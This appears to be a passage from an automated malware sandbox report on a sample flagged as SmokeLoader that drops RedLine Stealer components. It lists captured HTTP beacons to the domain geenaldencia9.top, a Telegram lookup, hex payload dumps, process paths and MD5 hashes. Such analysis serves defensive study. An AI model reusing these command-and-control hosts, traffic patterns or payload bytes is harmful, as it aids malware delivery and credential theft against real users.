                                                                                                                                                                                                  Data Raw: 32 61 33 34 65 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 ae 7c 95 e0 5f 29 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 d7 9b 87 cd 75 8f 78 51 a1 a2 8f 8a c5 e6 1c e0 32 02 50 08 68 db e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 61 e3 20 59 53 11 5c 7b c2 4c ab 48 11 80 cd 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 23 19 cc 8a 43 d8 06 0e 45 27 46 7d 2c 16 eb 04 89 f9 d4 57 80 90 70 89 ec f8 60 6b 56 ea a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 9e 70 9f 8a 86 e8 47 5a ad b2 cb 99 64 51 11 87 4a b1 b8 56 b0 40 f6 0a bf 8b 71 91 c0 75 f0 46 01 ff 56 59 27 64 5b 96 da 19 d1 3a 2d 32 42 06 02 23 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 40 d7 d8 03 f3 1e 7b d3 51 e6 49 04 38 4d 7c 14 2c ea e8 b1 14 eb 70 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 5a 50 bc a2 b7 f1 f6 6a 1f a7 e9 4d 51 22 47 64 cd 25 5c 8d b7 77 22 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a4 ed e1 5a fc 37 bc 17 fe 2f 63 9e f8 d8 62 40 42 25 e3 b5 be 34 80 9a 46 3e 99 86 11 02 83 37 42 c2 1a ce ae 30 4b 95 f6 cc 3c 38 02 19 39 dc e6 f6 bc b3 de bb 4e 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 4f bd 44 0f 91 e9 20 b3 9e 90 39 02 97 97 b8 57 
25 d5 81 d0 ea b9 7e 4a 08 a5 55 7a 98 6c 39 c0 5e f3 5c 19 6e 63 95 be 67 3d da fa 73 56 6b 5d a1 f4 5e 55 e9 1c 31 eb cd 9c 70 15 8e b9 82 7f 8e 54 a8 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af fd c6 83 21 2a 63 e7 98 af 67 26 95 07 62 61 87 bd f7 3f 67 09 01 8a ef 22 19 75 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 20 2c 0f 1a f9 e9 3b 79 ce 8b bc 08 c6 1c 84 82 42 17 7d 85 d8 36 1f 79 a2 be a7 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 f2 13 3b 75 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 64 f7 64 d8 81 10 22 a1 0e d1 64 cc 1f a7 41 d7 3f ed 62 1d 3f 64 7c 9c e7 f1 a4 c3 73 c1 aa 54 fb 26 83 ab cd e4 03 9b c1 c2 1c 7a 75 87 46 98 84 fe
                                                                                                                                                                                                  Data Ascii: 2a34e2S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|_)+%gtuxQ2Ph0YObyT=a'4a YS\{LHXKg[Ge92)g z6#CE'F},Wp`kV"H2I?o|6NI[LeU[0z;+W~5=PVpGZdQJV@quFVY'd[:-2B#GkKm@@{QI8M|,p"JG0Z"?kQZPjMQ"Gd%\w"&Q#F<pvAZ7/cb@B%4F>7B0K<89Nm6'NGc_,OD 9W%~JUzl9^\ncg=sVk]^U1pTN!{K.iw!*cg&ba?g"uzR{} ,;yB}6yw+;ulo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59dd"dA?b?d|sT&zuF


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49784 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:29.460577965 CEST | 5380 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:29.644783020 CEST | 5382 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:29 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.6 | 49787 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:29.830410957 CEST | 5383 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 191
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:30.035245895 CEST | 5384 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:29 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


HTTPS Proxied Packets

Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
0          | 192.168.2.6 | 49837       | 149.154.167.99 | 443              |

Timestamp | kBytes transferred | Direction | Data
2021-09-27 17:35:20 UTC | 0 | OUT | GET /hcdrom1 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/plain; charset=UTF-8
    Host: t.me
2021-09-27 17:35:20 UTC | 0 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 27 Sep 2021 17:35:20 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 4452
    Connection: close
    Set-Cookie: stel_ssid=2bddc583911bf88a3f_9899324691183686815; expires=Tue, 28 Sep 2021 17:35:20 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=35768000
2021-09-27 17:35:20 UTC | 0 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 63 64 72 6f 6d 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 44 2d 52 4f 4d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20
    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hcdrom1</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="CD-ROM"><meta property="og:image"


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 19:33:23
Start date: 27/09/2021
Path: C:\Users\user\Desktop\pAWNholT8X.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\pAWNholT8X.exe'
Imagebase: 0x400000
File size: 131072 bytes
MD5 hash: FB45ECBFB0E13B103B6B1C583479A21D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 19:33:29
Start date: 27/09/2021
Path: C:\Users\user\Desktop\pAWNholT8X.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\pAWNholT8X.exe'
Imagebase: 0x400000
File size: 131072 bytes
MD5 hash: FB45ECBFB0E13B103B6B1C583479A21D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 19:33:34
Start date: 27/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:33:35
Start date: 27/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:33:49
Start date: 27/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:34:02
Start date: 27/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:34:11
Start date: 27/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:34:14
Start date: 27/09/2021
Path: C:\Users\user\AppData\Roaming\ecrjwib
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ecrjwib
Imagebase: 0x400000
File size: 131072 bytes
MD5 hash: FB45ECBFB0E13B103B6B1C583479A21D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 19:34:20
Start date: 27/09/2021
Path: C:\Users\user\AppData\Local\Temp\6CB1.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\6CB1.exe
Imagebase: 0x400000
File size: 131072 bytes
MD5 hash: 2616D3A90B92A23F31A0BA2508076DFC
Has elevated privileges: true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:22
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                                                                  File size:441344 bytes
                                                                                                                                                                                                  MD5 hash:287976D8C62519CBB494CF31916CE26E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:23
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff61de10000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:26
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\8433.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\8433.exe
                                                                                                                                                                                                  Imagebase:0x300000
                                                                                                                                                                                                  File size:2766048 bytes
                                                                                                                                                                                                  MD5 hash:F853FE6B26DCF67545675AEC618F3A99
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:27
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:131072 bytes
                                                                                                                                                                                                  MD5 hash:2616D3A90B92A23F31A0BA2508076DFC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:28
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff61de10000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:29
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Imagebase:0x490000
                                                                                                                                                                                                  File size:441344 bytes
                                                                                                                                                                                                  MD5 hash:287976D8C62519CBB494CF31916CE26E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis
